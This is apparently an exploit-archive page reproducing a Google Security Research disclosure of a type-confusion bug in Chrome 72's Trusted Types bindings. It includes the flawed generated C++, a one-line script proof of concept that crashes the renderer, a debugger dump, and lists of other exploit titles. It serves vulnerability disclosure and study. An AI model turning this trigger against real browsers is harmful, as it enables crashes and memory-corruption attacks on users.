"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion"

Author

Exploit author

"Google Security Research"

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-04-03

                
                    
                         Download file
                    
                
            
VULNERABILITY DETAILS
The binding code generator doesn't add checks to ensure that the callback
properties of a dictionary are indeed JS functions. For example, for the
the TrustedTypePolicyOptions dictionary:
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/trustedtypes/trusted_type_policy_options.idl?rcl=6c2e672967359ad32d19af8b09873adab2c0beec&l=7
-------------------
dictionary TrustedTypePolicyOptions {
   CreateHTMLCallback createHTML;
   CreateScriptCallback createScript;
   CreateURLCallback createScriptURL;
   CreateURLCallback createURL;
   boolean exposed = false;
};

callback CreateHTMLCallback = DOMString (DOMString input);
callback CreateScriptCallback = DOMString (DOMString input);
callback CreateURLCallback = USVString (DOMString input);
-------------------

the code is generated as follows:
https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/renderer/bindings/core/v8/v8_trusted_type_policy_options.cc?rcl=077f8deee2dee38d4836be1df20115eba4884f69&l=35
-------------------
void V8TrustedTypePolicyOptions::ToImpl(v8::Isolate* isolate, v8::Local<v8::Value> v8_value, TrustedTypePolicyOptions* impl, ExceptionState& exception_state) {
  if (IsUndefinedOrNull(v8_value)) {
    return;
  }
  if (!v8_value->IsObject()) {
    exception_state.ThrowTypeError("cannot convert to dictionary.");
    return;
  }
  v8::Local<v8::Object> v8Object = v8_value.As<v8::Object>();
  ALLOW_UNUSED_LOCAL(v8Object);

  const v8::Eternal<v8::Name>* keys = eternalV8TrustedTypePolicyOptionsKeys(isolate);
  v8::TryCatch block(isolate);
  v8::Local<v8::Context> context = isolate->GetCurrentContext();
  v8::Local<v8::Value> create_html_value;
  if (!v8Object->Get(context, keys[0].Get(isolate)).ToLocal(&create_html_value)) {
    exception_state.RethrowV8Exception(block.Exception());
    return;
  }
  if (create_html_value.IsEmpty() || create_html_value->IsUndefined()) {
    // Do nothing.
  } else {
    V8CreateHTMLCallback* create_html_cpp_value = V8CreateHTMLCallback::Create(create_html_value.As<v8::Function>()); //******* cast with no prior check
    impl->setCreateHTML(create_html_cpp_value);
  }               
[...]
-------------------

Thus, any JS object might be interpreted as a function.


VERSION
Google Chrome 72.0.3626.81 (Official Build) (64-bit) 
Please note that the TrustedTypes feature is currently hidden behind the
"experimental platform features" flag.


REPRODUCTION CASE
<script>
TrustedTypes.createPolicy('foo', { createHTML: 0x41414141 });
</script>


(790.b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa:
00007ffe`ba967f5a 488b41ff        mov     rax,qword ptr [rcx-1] ds:41414140`ffffffff=????????????????
0:000> r
rax=00001313b3350115 rbx=00006fc6d6eaf920 rcx=4141414100000000
rdx=000000e521dfd190 rsi=000000e521dfd190 rdi=000000e521dfd1d8
rip=00007ffeba967f5a rsp=000000e521dfd130 rbp=000000e521dfd290
 r8=00007ffebfb25930  r9=0000000000000018 r10=0000000000000005
r11=00003f2bc628c240 r12=000000e521dfd330 r13=000001e7dbd16650
r14=000001e7ddc22a90 r15=00003f2bc62364b8
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa:
00007ffe`ba967f5a 488b41ff        mov     rax,qword ptr [rcx-1] ds:41414140`ffffffff=????????????????
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000e5`21dfd130 00007ffe`ba967f24 chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa [C:\b\c\b\win64_clang\src\v8\src\objects.cc @ 4010] 
01 000000e5`21dfd170 00007ffe`bab1a1d7 chrome_child!v8::Object::CreationContext+0x24 [C:\b\c\b\win64_clang\src\v8\src\api.cc @ 4859] 
02 000000e5`21dfd1b0 00007ffe`bd196835 chrome_child!blink::CallbackFunctionBase::CallbackFunctionBase+0x47 [C:\b\c\b\win64_clang\src\third_party\blink\renderer\platform\bindings\callback_function_base.cc @ 13] 
03 000000e5`21dfd210 00007ffe`bd195101 chrome_child!blink::V8TrustedTypePolicyOptions::ToImpl+0x125 [C:\b\c\b\win64_clang\src\out\Release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_trusted_type_policy_options.cc @ 57] 
04 000000e5`21dfd2f0 00007ffe`ba957f93 chrome_child!blink::V8TrustedTypePolicyFactory::CreatePolicyMethodCallback+0x211 [C:\b\c\b\win64_clang\src\out\Release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_trusted_type_policy_factory.cc @ 234] 
05 000000e5`21dfd3c0 00007ffe`bbbebb9f chrome_child!v8::internal::FunctionCallbackArguments::Call+0x253 [C:\b\c\b\win64_clang\src\v8\src\api-arguments-inl.h @ 147] 
06 000000e5`21dfd4e0 00007ffe`bbbeb631 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper<0>+0x20f [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 111] 
07 000000e5`21dfd5e0 00007ffe`ba957ca1 chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x111 [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 0] 
08 000000e5`21dfd6a0 00007ffe`bc23cdcf chrome_child!v8::internal::Builtin_HandleApiCall+0x41 [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 127] 
09 000000e5`21dfd700 00003921`bff1b0d1 chrome_child!Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit+0x4f

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Expense Management System - 'description' Stored Cross Site Scripting"	webapps	multiple	"Nikhil Kumar"
2020-12-02	"Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting"	webapps	multiple	"Parshwa Bhavsar"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Under Construction Page with CPanel 1.0 - SQL injection"	webapps	multiple	"Mayur Parmar"

Release Date	Title	Type	Platform	Author
2020-02-10	"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init"	dos	linux	"Google Security Research"
2020-02-10	"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()"	dos	multiple	"Google Security Research"
2020-01-28	"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image"	dos	multiple	"Google Security Research"
2020-01-14	"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM"	dos	android	"Google Security Research"
2020-01-14	"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN"	dos	android	"Google Security Research"
2019-12-18	"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()"	dos	macos	"Google Security Research"
2019-12-16	"Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds"	local	linux	"Google Security Research"
2019-12-11	"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font"	dos	windows	"Google Security Research"
2019-11-22	"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache"	local	macos	"Google Security Research"
2019-11-22	"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback"	dos	windows	"Google Security Research"
2019-11-20	"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd"	dos	ios	"Google Security Research"
2019-11-20	"Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Error Path"	dos	linux	"Google Security Research"
2019-11-20	"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs"	dos	linux	"Google Security Research"
2019-11-11	"iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address"	dos	multiple	"Google Security Research"
2019-11-11	"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream"	dos	windows	"Google Security Research"
2019-11-11	"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)"	dos	windows	"Google Security Research"
2019-11-05	"WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive"	dos	multiple	"Google Security Research"
2019-11-05	"macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()"	dos	macos	"Google Security Research"
2019-11-05	"JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects"	dos	multiple	"Google Security Research"
2019-10-30	"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation"	dos	multiple	"Google Security Research"
2019-10-28	"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed"	dos	multiple	"Google Security Research"
2019-10-21	"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)"	dos	windows	"Google Security Research"
2019-10-10	"Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter"	dos	windows	"Google Security Research"
2019-10-10	"Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File"	dos	windows	"Google Security Research"
2019-10-10	"Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File"	dos	windows	"Google Security Research"
2019-10-10	"Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File"	dos	windows	"Google Security Research"
2019-10-10	"Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File"	dos	windows	"Google Security Research"
2019-10-10	"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File"	dos	windows	"Google Security Research"
2019-10-09	"XNU - Remote Double-Free via Data Race in IPComp Input Path"	dos	macos	"Google Security Research"
2019-10-04	"Android - Binder Driver Use-After-Free"	local	android	"Google Security Research"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.